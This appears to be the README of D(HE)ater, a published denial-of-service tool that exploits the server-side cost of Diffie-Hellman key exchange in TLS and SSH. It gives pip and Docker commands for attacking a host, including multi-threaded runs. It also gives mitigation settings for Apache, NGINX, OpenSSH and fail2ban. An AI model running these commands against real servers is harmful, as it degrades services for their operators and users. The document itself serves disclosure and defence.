D(HE)ater
D(HE)ater is an attacking tool based on CPU heating in that it forces the ephemeral variant of Diffie-Hellman key exchange (DHE) in given cryptography protocols (e.g. TLS, SSH). It is performed without calculating a cryptographically correct ephemeral key on the client side, but with a significant amount of calculation on the server side. Based on this, D(HE)ater can initiate a denial-of-service (DoS) attack.
Quick start
D(HE)ater can be installed directly via pip from PyPi
pip install dheater
dheat --protocol tls ecc256.badssl.com
dheat --protocol ssh ecc256.badssl.com
or can be used via Docker from Docker Hub
docker pull balasys/dheater
docker run --tty --rm balasys/dheater --protocol tls ecc256.badssl.com
docker run --tty --rm balasys/dheater --protocol ssh ecc256.badssl.com
You can increase load by string extra threads.
dheat --thread-num 4 --protocol tls ecc256.badssl.com
docker run --tty --rm balasys/dheater --thread-num 4 --protocol tls ecc256.badssl.com
docker run --tty --rm balasys/dheater --thread-num 4 --protocol ssh ecc256.badssl.com
Mitigation
Configuration
Diffie-Hellman (DHE) key exchange should be disabled.
TLS
Apache
SSLCipherSuite ...:!kDHE
NGINX
ssl_ciphers ...:!kDHE;
Others
See moz://a SSL Configuration Generator for configuration syntax.
SSH
OpenSSH
KexAlgorithms -diffie-hellman-group1-sha1,diffie-hellman-group1-sha256,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha256,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha512
Fail2Ban
TLS
Apache
There are no relevant filters.
- apache-ssl.confin- fail2bandirectory should be copied to the- filter.ddirectory under the fail2ban configuration directory
- the followings should be added to the jail.localfile in the fail2ban configuration directory
[apache-ssl]
port    = https
logpath = %(apache_error_log)s
maxretry = 1
Postfix
There is a relevant filter, but it is applied only in ddos mode. The followings should be added to jail.local.
[postfix]
mode = ddos
Dovecot
There is a relevant filter, but it is applied only in ddos mode. The followings should be added to jail.local.
[dovecot]
mode = aggressive
or a specific filter can be used without changing the mode of dovecot.
- dovecot-ssl.confin- fail2bandirectory should be copied to the- filter.ddirectory under the fail2ban configuration directory
- the followings should be added to jail.localin tge fail2ban configuration directory
[dovecot-ssl]
port    = pop3,pop3s,imap,imaps,submission,465,sieve
logpath = %(dovecot_log)s
backend = %(dovecot_backend)s
maxretry = 1
SSH
OpenSSH
There is a relevant filter, but it is applied only in ddos mode. The followings should be added to jail.local.
[sshd]
mode = ddos
License
The code is available under the terms of Apache License Version 2.0. A non-comprehensive, but straightforward description and also the full license text can be found at Choose an open source license website.
